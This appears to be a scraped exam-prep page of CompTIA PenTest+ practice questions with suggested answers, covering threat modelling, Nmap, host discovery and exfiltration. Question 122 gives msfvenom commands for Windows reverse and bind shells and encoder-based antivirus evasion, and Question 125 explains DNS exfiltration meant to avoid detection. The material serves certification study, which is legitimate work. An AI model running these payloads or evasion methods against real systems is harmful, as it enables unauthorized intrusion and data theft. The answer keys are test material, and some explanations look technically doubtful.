ExamGecko
Home / CompTIA / PT0-003 / List of questions
Ask Question

CompTIA PT0-003 Practice Test - Questions Answers, Page 13

Add to Whishlist

List of questions

Question 121

Report Export Collapse

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

The tester is conducting a web application test.

The tester is conducting a web application test.

The tester is assessing a mobile application.

The tester is assessing a mobile application.

The tester is evaluating a thick client application.

The tester is evaluating a thick client application.

The tester is creating a threat model.

The tester is creating a threat model.

Suggested answer: D
Explanation:

DREAD for Threat Modeling:

DREAD is a risk assessment framework used in threat modeling to prioritize vulnerabilities based on their impact, reproducibility, exploitability, affected users, and discoverability.

It is specifically designed for creating and analyzing threat models.

Why Not Other Options?

A, B, C: While DREAD can be applied in various contexts (web, mobile, thick client applications), its primary purpose is threat modeling, not specific testing methodologies like PTES.

CompTIA Pentest+

Reference:

Domain 1.0 (Planning and Scoping)

asked 20/01/2025
Tom Rez
42 questions

Question 122

Report Export Collapse

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443

msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000

msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none

msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none

net user add /administrator | hexdump > payload

net user add /administrator | hexdump > payload

Suggested answer: A
Explanation:

Using shikata_ga_nai:

This encoder obfuscates the payload, making it harder for antimalware to detect.

The command specifies a bind shell (windows/bind_tcp) payload, targeting Windows with architecture x86-64.

Why Not Other Options?

B, C: These commands generate payloads but do not use an encoder, increasing the likelihood of detection by antimalware.

D: This command is unrelated to generating shellcode; it appears to be an attempt to manipulate accounts.

CompTIA Pentest+

Reference:

Domain 3.0 (Attacks and Exploits)

asked 20/01/2025
Sweet Don
42 questions

Question 123

Report Export Collapse

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

bash

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

Database

Database

Remote access

Remote access

Email

Email

File sharing

File sharing

Suggested answer: D
Explanation:

From the Nmap results:

Service Analysis:

SSH (22): Secure Shell is a remote access protocol that is typically well-secured with encryption and authentication mechanisms. It's not the easiest to exploit without valid credentials or known vulnerabilities.

SMTP (25): The port is filtered, which indicates that it might be blocked by a firewall, making it less accessible as an attack vector.

RPCBind (111): RPC services can sometimes expose vulnerabilities, but they are less common in modern systems.

NFS (2049): Network File System is a file-sharing service. Misconfigured NFS servers often expose sensitive files or directories that can be accessed without proper authentication.

Best Target:

NFS (port 2049) is the most attractive target. Attackers can exploit insecure exports, gain unauthorized access to shared directories, or elevate privileges if the server allows root access over NFS.

CompTIA Pentest+

Reference:

Domain 2.0 (Information Gathering and Vulnerability Identification)

Domain 3.0 (Attacks and Exploits)

asked 20/01/2025
ENET SOLUTIONS LOGICOM
42 questions

Question 124

Report Export Collapse

A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

bash

for var in ---MISSING TEXT---

do

ping -c 1 192.168.10.$var

done

Which of the following pieces of code should the penetration tester use in place of the ---MISSING TEXT--- placeholder?

crunch 1 254 loop

crunch 1 254 loop

seq 1 254

seq 1 254

echo 1-254

echo 1-254

{1.-254}

{1.-254}

Suggested answer: B
Explanation:

Correct Syntax for a Range Loop in Bash:

The seq command generates a sequence of numbers in a specified range, which is ideal for iterating over IP addresses in a Class C subnet (1--254).

Example: seq 1 254 will output numbers 1, 2, ..., 254 sequentially.

Explanation of Other Options:

A (crunch): The crunch command is used for wordlist generation and is unrelated to looping in Bash.

C (echo 1-254): This would output '1-254' as a string instead of generating a numeric range.

D ({1.-254}): This is incorrect Bash syntax and would result in a script error.

Final Script:

bash

for var in $(seq 1 254)

do

ping -c 1 192.168.10.$var

done

CompTIA Pentest+

Reference:

Domain 4.0 (Penetration Testing Tools)

Bash Scripting and Automation

asked 20/01/2025
Larry Wong
35 questions

Question 125

Report Export Collapse

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client's blue team. Which of the following exfiltration methods most likely remain undetected?

Cloud storage

Cloud storage

Email

Email

Domain Name System

Domain Name System

Test storage sites

Test storage sites

Suggested answer: C
Explanation:

The Domain Name System (DNS) is commonly used for covert exfiltration because it is an essential protocol in most networks and is less likely to be scrutinized compared to other methods. Here's how DNS exfiltration works:

Mechanism:

Data is encoded into DNS queries or responses, such as using subdomain fields to transmit sensitive information.

These queries are sent to a malicious DNS server controlled by the attacker, allowing data to bypass traditional detection mechanisms.

Why It Remains Undetected:

DNS traffic is frequently allowed and not as heavily monitored compared to other channels like HTTP or email.

Network security tools often prioritize operational DNS traffic, making detection of anomalies more challenging.

CompTIA Pentest+

Reference:

Domain 3.0 (Attacks and Exploits)

Domain 5.0 (Reporting and Communication)

asked 20/01/2025
Ahmed Otmani Amaoui
38 questions

Question 126

Report Export Collapse

During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

API

API

HTTP

HTTP

IPA

IPA

ICMP

ICMP

Suggested answer: A
Explanation:

API as a Target:

APIs (Application Programming Interfaces) are common assets to test for vulnerabilities such as improper authentication, data leakage, or injection attacks.

Testing APIs often uncovers critical issues in modern applications.

Why Not Other Options?

B (HTTP): This is a protocol, not a specific asset.

C (IPA): Unrelated to penetration testing (likely a typo or irrelevant here).

D (ICMP): This is a protocol used for network diagnostics, not an application asset.

CompTIA Pentest+

Reference:

Domain 1.0 (Planning and Scoping)

asked 20/01/2025
Kevin Langthorne
41 questions

Question 127

Report Export Collapse

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

Service discovery

Service discovery

OS fingerprinting

OS fingerprinting

Host discovery

Host discovery

DNS enumeration

DNS enumeration

Suggested answer: C
Explanation:

In network penetration testing, the initial steps involve gathering information to build an understanding of the network's structure, devices, and potential entry points. The process generally follows a structured approach, starting from broad discovery methods to more specific identification techniques. Here's a comprehensive breakdown of the steps:

Host Discovery (Answer: C):

Objective: Identify live hosts on the network.

Tools & Techniques:

Ping Sweep: Using tools like nmap with the -sn option (ping scan) to check for live hosts by sending ICMP Echo requests.

ARP Scan: Useful in local networks, arp-scan can help identify all devices on the local subnet by broadcasting ARP requests.

nmap -sn 192.168.1.0/24

*

Reference:

The GoBox HTB write-up emphasizes the importance of identifying hosts before moving to service enumeration.

The Forge HTB write-up also highlights using Nmap for initial host discovery in its enumeration phase.

* Service Discovery (Option A):

Objective: After identifying live hosts, determine the services running on them.

Tools & Techniques:

Nmap: Often used with options like -sV for version detection to identify services.

nmap -sV 192.168.1.100

* Reference:

As seen in multiple write-ups (e.g., Anubis HTB and Bolt HTB), service discovery follows host identification to understand the services available for potential exploitation.

* OS Fingerprinting (Option B):

Objective: Determine the operating system of the identified hosts.

Tools & Techniques:

Nmap: With the -O option for OS detection.

nmap -O 192.168.1.100

* Reference:

Accurate OS fingerprinting helps tailor subsequent attacks and is often performed after host and service discovery, as highlighted in the write-ups.

* DNS Enumeration (Option D):

Objective: Identify DNS records and gather subdomains related to the target domain.

Tools & Techniques:

dnsenum, dnsrecon, and dig.

dnsenum example.com

DNS enumeration is crucial for identifying additional attack surfaces, such as subdomains and related services. This step is typically part of the reconnaissance phase but follows host discovery and sometimes service identification.

Conclusion: The initial engagement in a network penetration test is to identify the live hosts on the network (Host Discovery). This foundational step allows the penetration tester to map out active devices before delving into more specific enumeration tasks like service discovery, OS fingerprinting, and DNS enumeration. This structured approach ensures that the tester maximizes their understanding of the network environment efficiently and systematically.

asked 20/01/2025
Nqobile Nxumalo
46 questions

Question 128

Report Export Collapse

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Become a Premium Member for full access
  Unlock Premium Member

Question 129

Report Export Collapse

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Become a Premium Member for full access
  Unlock Premium Member

Question 130

Report Export Collapse

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command: nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

Become a Premium Member for full access
  Unlock Premium Member
Total 214 questions
Go to page: of 22
Search

Related questions